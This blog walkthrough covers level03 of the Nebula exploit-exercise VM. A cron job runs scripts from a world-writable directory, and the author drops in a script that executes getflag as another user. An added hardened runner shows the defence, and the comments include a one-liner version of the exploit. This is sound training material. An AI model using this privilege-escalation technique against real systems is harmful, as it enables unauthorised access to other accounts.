Nebula exploit exercises walkthrough – level03

level03

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

cron is a utility used to run tasks periodically, found in nearly every distro.

In /home/flag03, we have a script – writable.sh – and a directory – writable.d.

level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh

Let’s take a look at writable.sh:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

This is fairly simple – for each file in the writable.d directory, run it with bash and then delete it. bash -x runs the script in trace mode, printing each command as it is executed. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.

Note that the writable.d directory is world-writable (drwxrwxrwx in the listing above) – so we can just put a script in there, and it will be run as whichever user runs writable.sh:

level03@nebula:~$ cat getflag.sh 
#!/bin/sh

/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Then wait a short while, assuming that the writable.sh script is the one being run by cron…

level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out 
You have successfully executed getflag on a target account
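
The weakness here is a scheduled job that runs whatever it finds in a directory anyone can write to. As an added example (not code from the original post or from the Nebula VM), here is a hardened version of the loop that refuses to run drop-in files unless both the directory and the file are owned by the job's own user and are not group- or world-writable. The function names is_trusted and run_dropins are hypothetical, and the mode check assumes a stat that supports -c (GNU coreutils or BusyBox).

```sh
#!/bin/sh
# Added example: hardened drop-in runner. Not the Nebula script.
# Assumption: stat supports -c '%a' (GNU coreutils / BusyBox).

# is_trusted PATH: succeed only if PATH is not a symlink, is owned by the
# user running this job, and has no group/other write bits set.
is_trusted() {
    p=$1
    [ -L "$p" ] && return 1              # a symlink could point anywhere
    [ -O "$p" ] || return 1              # owner must be the job's own user
    mode=$(stat -c '%a' "$p") || return 1
    [ $(( 0$mode & 022 )) -eq 0 ]        # reject g+w and o+w
}

# run_dropins DIR: run each regular file in DIR, but only when DIR and the
# file both pass is_trusted. Returns 1 without running anything if DIR
# itself is untrusted (e.g. mode 777 like writable.d).
run_dropins() {
    dir=$1
    if ! is_trusted "$dir"; then
        echo "refusing: $dir is not a trusted directory" >&2
        return 1
    fi
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if is_trusted "$f"; then
            (ulimit -t 5; sh "$f")       # same CPU limit as the original
        else
            echo "skipping untrusted file: $f" >&2
        fi
    done
}

# When called with a directory argument (e.g. from a crontab entry), run it.
if [ $# -gt 0 ]; then
    run_dropins "$1"
fi
```

Run against a directory with the permissions shown for writable.d (drwxrwxrwx), run_dropins returns 1 and executes nothing.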

Aside

Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?

There is a root user in the Nebula VM, and using that I can do:

nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh

But I can’t do that as level03:

level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u

Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.

So, not sure how I would go about finding cron jobs as an unprivileged user.

I’ve asked on the Unix Stack Exchange.

7 thoughts on “Nebula exploit exercises walkthrough – level03”

  1. lollipoponlips

    October 16, 2016 at 9:18pm

    I’ve just started to do these exercises. I’m confused:

    1) what is the objective exactly?

  2. […] the cleanest, but it works to get the flag. I had the same thought as Cybergibbons though, (see this article) and from what I see of his findings, the only way to detect cronjobs if you don’t have […]

  3. Shinko

    May 6, 2017 at 12:47am

    For fun, I decided to try and one-Liner it:
    echo -e '#!/usr/bin/bash\n\n/bin/getflag>/home/flag03/got_result.txt\n'>/home/flag03/writable.d/get_flag.sh;chmod +x /home/flag03/writable.d/get_flag.sh

  4. emily

    November 18, 2017 at 12:30am

    level03@nebula:~$ cat getfile.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory

    ??

  5. emily

    November 18, 2017 at 12:32am

    level03@nebula:~$ cat getflag.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory.

    What am I doing wrong?

    • evan

      December 27, 2017 at 5:23pm

      Did you create the getflag.sh script and is it located in your home directory?

    • manuelh

      March 29, 2018 at 7:56pm

      Try the following:
      level03@nebula:~$ cat > getflag.sh
      #!/bin/sh

      /bin/getflag >> /tmp/flag03.out

      level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/
